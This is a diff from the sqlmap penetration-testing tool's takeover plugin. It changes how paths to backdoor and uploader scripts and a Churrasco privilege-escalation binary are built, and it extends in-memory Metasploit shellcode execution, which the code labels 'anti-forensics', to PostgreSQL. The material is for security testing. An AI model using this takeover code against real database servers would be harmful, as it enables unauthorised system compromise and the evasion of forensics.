sqlmap 0.8-rc2: minor enhancement based on msfencode 3.3.3-dev -t exe-small so that also PostgreSQL supports again the out-of-band via Metasploit payload stager optionally to shellcode execution in-memory via sys_bineval() UDF. Speed up OOB connect back. Cleanup target file system after --os-pwn too. Minor bug fix to correctly forge file system paths with os.path.join() all around. Minor code refactoring and user's manual update.

2025-12-06 12:41:30 +00:00 · 2009-12-17 22:04:01 +00:00
parent a605980d66
commit e4e081cdc6
12 changed files with 103 additions and 76 deletions
--- a/plugins/generic/takeover.py
+++ b/plugins/generic/takeover.py
@@ -163,9 +163,9 @@ class Takeover(Abstraction, Metasploit, Registry):
                logger.warn("invalid value, it must be 1 or 3")

        backdoorName = "backdoor.%s" % language
-        backdoorPath = "%s/%s" % (paths.SQLMAP_SHELL_PATH, backdoorName)
+        backdoorPath = os.path.join(paths.SQLMAP_SHELL_PATH, backdoorName)
        uploaderName = "uploader.%s" % language
-        uploaderStr  = fileToStr("%s/%s" % (paths.SQLMAP_SHELL_PATH, uploaderName))
+        uploaderStr  = fileToStr(os.path.join(paths.SQLMAP_SHELL_PATH, uploaderName))

        for directory in directories:
            # Upload the uploader agent
@@ -250,7 +250,7 @@ class Takeover(Abstraction, Metasploit, Registry):

        if not output or output[0] in ( "y", "Y" ):
            # TODO: add also compiled/packed Churrasco for Windows 2008
-            wFile = "%s/tokenkidnapping/Churrasco.exe" % paths.SQLMAP_CONTRIB_PATH
+            wFile = os.path.join(paths.SQLMAP_CONTRIB_PATH, "tokenkidnapping", "Churrasco.exe")

            self.churrascoPath    = "%s/sqlmapchur%s.exe" % (conf.tmpPath, randomStr(lowercase=True))
            self.cmdFromChurrasco = True
@@ -307,7 +307,7 @@ class Takeover(Abstraction, Metasploit, Registry):

        goUdf = False

-        if kb.dbms == "MySQL":
+        if kb.dbms in ( "MySQL", "PostgreSQL" ):
            msg  = "how do you want to execute the Metasploit shellcode "
            msg += "on the back-end database underlying operating system?"
            msg += "\n[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)"
@@ -330,9 +330,6 @@ class Takeover(Abstraction, Metasploit, Registry):
            if choice == 1:
                goUdf = True

-        elif kb.dbms == "PostgreSQL":
-            goUdf = True
-
        if goUdf is True:
            self.createMsfShellcode(exitfunc="thread", format="raw", extra="BufferRegister=EAX", encode="x86/alpha_mixed")
        else: